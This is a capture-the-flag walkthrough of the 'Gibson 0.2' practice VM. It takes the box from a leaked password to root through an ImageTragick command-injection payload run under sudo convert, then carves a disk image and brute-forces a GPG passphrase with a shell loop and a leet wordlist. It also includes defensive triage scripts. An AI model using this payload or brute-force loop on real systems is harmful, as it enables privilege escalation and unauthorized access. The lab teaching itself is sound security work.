published on in writeup
tags: gibson

Gibson 0.2

Livestream

Writeup

nmap

root@kali:~# nmap -n -p- -sV 192.168.56.102

22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7

davinci

Opening the page in Iceweasel, we get a simple directory listing with davinci.html.

<html>
<title>Gibson Mining Corporation</title>
<body>
<!-- Damn it Margo! Stop setting your password to "god" -->
<!-- at least try and use a different one of the 4 most -->
<!-- common ones! (eugene) -->
<h1> The answer you seek will be found by brute force</h1>
</body>

SSH

We can use margo:god to establish an SSH session :)

root@kali:~# ssh margo@192.168.56.102

margo@192.168.56.102's password: 
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic x86_64)

margo@gibson:~$ id
uid=1002(margo) gid=1002(margo) groups=1002(margo),27(sudo)

margo@gibson:~$ sudo -l
Matching Defaults entries for margo on gibson:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User margo may run the following commands on gibson:
    (ALL) NOPASSWD: /usr/bin/convert

ImageTragick

First check the version: upstream fixed the delegate command injection (ImageTragick, CVE-2016-3714) in 6.9.3-10 and 7.0.1-1, so anything older is in range. A distribution can backport the fix without bumping the version string, so a matching version is a strong hint rather than proof; the sudo run below settles it.

margo@gibson:~$ convert --version
Version: ImageMagick 6.7.7-10

The https coder hands the URL to the curl delegate defined in delegates.xml, and that command line is run through a shell without the URL being escaped, so the " in the payload closes the quoted URL and ;/bin/sh runs as a second command. Because sudo runs convert as root without a password, the shell we get is root ^_^

margo@gibson:~$ sudo convert 'https://example.com";/bin/sh"' out.png
# id
uid=0(root) gid=0(root) groups=0(root)
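Two checks a practitioner would run around this step, as an added shell example that is not part of the original writeup: whether the upstream version predates the fix, and whether policy.xml denies the coders that reach the shell delegates. The fixed versions (6.9.3-10 and 7.0.1-1) and the coder list are taken from the ImageTragick advisory; the policy.xml location varies by distribution (commonly /etc/ImageMagick/policy.xml or /etc/ImageMagick-6/policy.xml) and is an assumption in the usage line.

```sh
#!/bin/sh
# Added example, not from the original writeup: triage an ImageMagick install
# for the delegate injection (ImageTragick, CVE-2016-3714) abused above.
# Fixed upstream versions and the coder list follow the ImageTragick advisory.

# version_ge A B: succeed if version A >= version B. Fields are split on
# '.' and '-', so 6.7.7-10 compares as 6 7 7 10.
version_ge() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        na = split(a, x, /[.-]/); nb = split(b, y, /[.-]/)
        n = (na > nb) ? na : nb
        for (i = 1; i <= n; i++) {
            p = (i <= na) ? x[i] + 0 : 0
            q = (i <= nb) ? y[i] + 0 : 0
            if (p > q) exit 0
            if (p < q) exit 1
        }
        exit 0
    }'
}

# imagetragick_version_fixed VERSION: succeed if the upstream version string
# (the third field of "convert --version") carries the fix.
imagetragick_version_fixed() {
    case "$1" in
        7.*) version_ge "$1" 7.0.1-1 ;;
        *)   version_ge "$1" 6.9.3-10 ;;
    esac
}

# Coders the advisory recommends denying: each can reach a delegate that is
# run through a shell, or read and write arbitrary local files.
DANGEROUS_CODERS="EPHEMERAL URL HTTPS MVG MSL TEXT SHOW WIN PLT"

# write_hardened_policy FILE: write the advisory's policy.xml mitigation.
write_hardened_policy() {
    {
        echo '<policymap>'
        for c in $DANGEROUS_CODERS; do
            printf '  <policy domain="coder" rights="none" pattern="%s" />\n' "$c"
        done
        echo '</policymap>'
    } > "$1"
}

# policy_denies_coders FILE: succeed only if every dangerous coder is denied.
# Assumes one <policy .../> element per line, as ImageMagick ships the file.
policy_denies_coders() {
    for c in $DANGEROUS_CODERS; do
        grep '<policy' "$1" | grep 'domain="coder"' | grep 'rights="none"' \
            | grep -q "pattern=\"$c\"" || return 1
    done
}

# triage VERSION POLICY_FILE: print a one-line verdict, return 0 when covered.
triage() {
    if imagetragick_version_fixed "$1"; then
        echo "version $1: upstream fix present"; return 0
    elif policy_denies_coders "$2"; then
        echo "version $1 predates the fix, but $2 denies the dangerous coders"; return 0
    else
        echo "version $1 predates the fix and $2 does not deny the dangerous coders"; return 1
    fi
}

# Usage (path is an assumption, adjust for the distribution):
#   triage "$(convert --version | awk '/^Version/ {print $3}')" /etc/ImageMagick/policy.xml
```

A "predates the fix" verdict is a lead, not a proof: distributions backport fixes without changing the upstream string (Ubuntu 14.04's package kept reporting 6.7.7-10 after its security update), so on a real target confirm with the package changelog or, as here, by running the payload. A policy.xml that denies the coders is worth checking even on a patched build, because it also closes the file-read and file-delete variants that share the same delegate plumbing.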

Where art thou, flag?

There’s no flag in /root, so it looks like we’ll have to look at little deeper.

# ps aux

libvirt+  1303  0.5  7.3 841876 111516 ?       Sl   22:33   0:21 /usr/bin/qemu-system-x86_64 -name ftpserv -S -machine pc-i440fx-trusty,accel=tcg,usb=off -m 2

# ifconfig
virbr0    Link encap:Ethernet  HWaddr fe:54:00:72:e2:fb  
          inet addr:192.168.122.1  Bcast:192.168.122.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:6 errors:0 dropped:0 overruns:0 frame:0
          TX packets:15 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:1271 (1.2 KB)  TX bytes:1889 (1.8 KB)

# netstat -antp

tcp        0      0 192.168.122.1:53        0.0.0.0:*               LISTEN      1290/dnsmasq    
tcp        0      0 127.0.0.1:5900          0.0.0.0:*               LISTEN      1303/qemu-system-x8

A QEMU guest named ftpserv is running under libvirt: virbr0 at 192.168.122.1 is the host side of the libvirt NAT bridge, and the guest's VNC console is bound to 127.0.0.1:5900. We could set up an SSH port forward back to our machine and use a VNC client to interact with the guest. But I figured I would just find the image, move it to my kali VM and interact with it forensically.

The process list gives the guest's libvirt domain name, ftpserv. libvirt normally names the disk image after the domain, so we can search on that (virsh domblklist ftpserv would list the backing file directly).

# find / -name 'ftpserv*'

/var/lib/libvirt/images/ftpserv.img

I copied it to the web root for easy downloading

# cp /var/lib/libvirt/images/ftpserv.img /var/www/html
# chmod 666 /var/www/html/ftpserv.img

root@kali:~# wget http://192.168.56.102/ftpserv.img

root@kali:~# file ftpserv.img 
ftpserv.img: DOS/MBR boot sector, FREE-DOS Beta 0.9 MBR; partition 1 : ID=0xe, active, start-CHS (0x0,1,1), end-CHS (0xf,15,63), startsector 63, 1048257 sectors

Sleuthing

First, display the partition layout of the volume with mmls

root@kali:~# mmls ftpserv.img 
DOS Partition Table
Offset Sector: 0
Units are in 512-byte sectors

      Slot      Start        End          Length       Description
000:  Meta      0000000000   0000000000   0000000001   Primary Table (#0)
001:  -------   0000000000   0000000062   0000000063   Unallocated
002:  000:000   0000000063   0001048319   0001048257   Win95 FAT16 (0x0e)
003:  -------   0001048320   0001048575   0000000256   Unallocated

Take note of the start offset of the FAT16 partition: sector 63, i.e. 63 * 512 = 32256 bytes. fls and icat take that offset in sectors via -o. Then list file and directory names in the partition with fls.

root@kali:~# fls -f fat16 -o 63 ftpserv.img 
r/r 3:	KFYLNN      (Volume Label Entry)
d/d 4:	DOS
r/r 5:	KERNEL.SYS
r/r 6:	AUTOEXEC.BAT
r/r 7:	COMMAND.COM
r/r 8:	FDCONFIG.SYS
r/r 9:	BOOTSECT.BIN
d/d 11:	net
d/d 12:	GARBAGE
r/r * 13:	_WSDPMI.SWP
v/v 16763907:	$MBR
v/v 16763908:	$FAT1
v/v 16763909:	$FAT2
d/d 16763910:	$OrphanFiles

root@kali:~# fls -f fat16 -o 63 ftpserv.img 12
r/r 845574:	jz_ug.ans
r/r * 845576:	cookies.txt^
r/r 845578:	adminspo.jpg
r/r 845580:	flag.img
r/r * 845582:	cookies.txt^

Looks like flag.img is what we need - we can use icat to extract it.

root@kali:~# icat -f fat16 -o 63 ftpserv.img 845580 > flag.img

root@kali:~# file flag.img 
flag.img: Linux rev 1.0 ext2 filesystem data, UUID=d59bdd40-ec37-4d24-a956-80f549846121
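The mmls, fls and icat steps above as reusable shell functions, added here as an example that is not part of the original writeup. The carving function needs The Sleuth Kit on the path; the two parsing helpers only need awk and read the output formats shown above, and the byte-offset helper gives the number the kernel's loop mount wants instead of the sector count TSK uses.

```sh
#!/bin/sh
# Added example, not from the original writeup: automate the
# mmls -> fls -> icat carving of a file from the first FAT partition of an
# image, and compute the byte offset needed to loop-mount that partition.

# fat_start_sector: read mmls output on stdin and print the start sector of
# the first FAT partition, zero padding stripped.
fat_start_sector() {
    awk '/FAT/ { print $3 + 0; exit }'
}

# byte_offset SECTOR [SECTOR_SIZE]: byte offset of that sector, which is what
# mount -o offset= wants (mmls reports sectors, fls/icat take -o in sectors).
byte_offset() {
    echo $(( $1 * ${2:-512} ))
}

# inode_for_name NAME: read "fls -r -p" output on stdin and print the
# metadata address of the first entry whose path is NAME or ends in /NAME.
# Deleted entries carry an extra "*" column, so the address is taken from the
# field just before the path rather than from a fixed column. File names are
# assumed to contain no spaces.
inode_for_name() {
    awk -v n="$1" '{
        p = $NF
        if (p == n || substr(p, length(p) - length(n)) == "/" n) {
            i = $(NF - 1); sub(/:$/, "", i); print i; exit
        }
    }'
}

# carve IMAGE NAME OUT: locate NAME in the first FAT partition of IMAGE and
# copy it out with icat. Requires mmls, fls and icat from The Sleuth Kit.
carve() {
    img=$1 name=$2 out=$3
    off=$(mmls "$img" | fat_start_sector)
    [ -n "$off" ] || { echo "no FAT partition in $img" >&2; return 1; }
    inode=$(fls -r -p -f fat16 -o "$off" "$img" | inode_for_name "$name")
    [ -n "$inode" ] || { echo "$name not found in $img" >&2; return 1; }
    icat -f fat16 -o "$off" "$img" "$inode" > "$out"
}

# Usage: carve ftpserv.img flag.img flag.img
```

On this image carve ftpserv.img flag.img flag.img reproduces the icat step without copying the inode number by hand. If you would rather use the kernel's FAT driver, the byte offset is what matters: mount -o ro,loop,offset=$(byte_offset 63) -t vfat ftpserv.img /mnt. Mount read-only either way; a read-write ext2 mount like the one below updates the superblock's mount count and mount time, so the evidence file is no longer byte-for-byte what you extracted.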

You could continue using forensics here, but I was determined to mount something today! :)

root@kali:~# mount -t ext2 flag.img /mnt/

root@kali:~# ls -la /mnt/

-rwxrwxr-x  1 root root 21358 Nov 16  2011 davinci
-rw-r--r--  1 root root 28030 Nov 16  2011 davinci.c
-rw-r--r--  1 root root   159 May  5 19:56 hint.txt
drwxr-xr-x  2 root root  1024 May  5 20:07 .trash

root@kali:~# ls -la /mnt/.trash/

---x------ 1 root root    469 May 14 14:18 flag.txt.gpg
-rw-r--r-- 1 root root 320130 Sep  7  2015 LeithCentralStation.jpg

root@kali:~# cat /mnt/hint.txt

http://www.imdb.com/title/tt0117951/ and
http://www.imdb.com/title/tt0113243/ have
someone in common... Can you remember his
original nom de plume in 1988...?

So we have a GPG-protected flag and a hint as to what the password could be. I started looking at Jonny Lee Miller and some associated nicknames/aliases etc. Eventually I came up with Sick Boy and Zero Cool. Neither of these worked vanilla, so I thought I’d use john to create a wordlist. I didn’t know off-hand of any tools that could bruteforce GPG, so I wrote a terrible bash wrapper for it.

while IFS= read -r p
do
	# read one candidate per line (a for loop over `cat` splits on spaces);
	# --batch keeps gpg non-interactive and --yes lets it overwrite a stale
	# output file. gpg 2.1+ also needs --pinentry-mode loopback before
	# --passphrase is honoured. Success is taken from gpg's exit status.
	if gpg --batch --yes --output /root/flag --passphrase "${p}" \
		--decrypt /mnt/.trash/flag.txt.gpg </dev/null
	then
		echo "found: ${p}"
		exit 0
	fi
done < words

None of the wordlists I created worked, so knigh-home dropped me a hint that it was in leet speak and told me of a leetify script that I should look for. Googling for it brought me to an old post on the BackTrack forum.

So I generated a new wordlist and ran my bruteforce again. These still weren’t working and I was given a final hint to try zerokool instead of zerocool.
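For anyone without the BackTrack script to hand, here is a leet-speak word mangler as an added shell example; it is not part of the original writeup and not the leetify.pl used below. For every letter that has a leet substitute it keeps both spellings, so a word with n substitutable letters expands to all 2^n candidates, which covers zerokool -> z3r0k001 and every partial variant in between. The substitution table is an assumption; extend it as needed.

```sh
#!/bin/sh
# Added example, not from the original writeup: expand each word into every
# combination of leet substitutions. Uses "local" for the recursion, which
# dash, bash and busybox sh all support.

# leet_char CHAR: print the leet substitute for CHAR, or nothing if none.
# The table is an assumption; the common digit swaps are enough for this box.
leet_char() {
    case "$1" in
        a|A) echo 4 ;;
        e|E) echo 3 ;;
        i|I) echo 1 ;;
        l|L) echo 1 ;;
        o|O) echo 0 ;;
        s|S) echo 5 ;;
        t|T) echo 7 ;;
        *)   echo ;;
    esac
}

# leet_variants WORD [PREFIX]: print every variant of WORD, one per line.
# Works one character at a time; PREFIX is the part already decided. The
# original character is always emitted first, then its substitute if any.
leet_variants() {
    local word prefix c rest sub
    word=$1
    prefix=${2:-}
    if [ -z "$word" ]; then
        printf '%s\n' "$prefix"
        return
    fi
    c=$(printf '%.1s' "$word")
    rest=${word#?}
    leet_variants "$rest" "$prefix$c"
    sub=$(leet_char "$c")
    if [ -n "$sub" ]; then
        leet_variants "$rest" "$prefix$sub"
    fi
}

# Each command-line argument is expanded; with no arguments nothing is
# printed, so the file can also be sourced for its functions.
for w in "$@"; do
    leet_variants "$w"
done
```

./leetify.sh zerocool zerokool > l33t gives 64 candidates (five substitutable letters in each spelling), which the gpg wrapper above reads one per line. Because the original spelling is always emitted too, the plain words are in the list and do not need a separate run.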

root@kali:~# ./leetify.pl < words > l33t

root@kali:~# ./gpg.sh 
[...snip...]
gpg: decryption failed: bad key
gpg: CAST5 encrypted data
gpg: encrypted with 1 passphrase
gpg: WARNING: message was not integrity protected
found

root@kali:~# ls -l

-rw-r--r-- 1 root root       862 May 22 10:34 flag

root@kali:~# cat flag
 _   _            _      _____ _             ____  _                  _   _
| | | | __ _  ___| | __ |_   _| |__   ___   |  _ \| | __ _ _ __   ___| |_| |
| |_| |/ _` |/ __| |/ /   | | | '_ \ / _ \  | |_) | |/ _` | '_ \ / _ \ __| |
|  _  | (_| | (__|   <    | | | | | |  __/  |  __/| | (_| | | | |  __/ |_|_|
|_| |_|\__,_|\___|_|\_\   |_| |_| |_|\___|  |_|   |_|\__,_|_| |_|\___|\__(_)


Should you not be standing in a 360 degree rotating payphone when reading
this flag...? B-)

Anyhow, congratulations once more on rooting this VM. This time things were
a bit esoteric, but I hope you enjoyed it all the same.

Shout-outs again to #vulnhub for hosting a great learning tool. A special
thanks goes to g0blin and GKNSB for testing, and to g0tM1lk for the offer
to host the CTF once more.
                                                              --Knightmare

Shout outs

Thanks knightmare for the VM and the continued hints throughout the livestream :)

Thanks to everyone who stopped by for the livestream and particularly to those who posted in Twitch chat and the IRC channel. Honourable mentions go to rfc, dqi and superkojiman.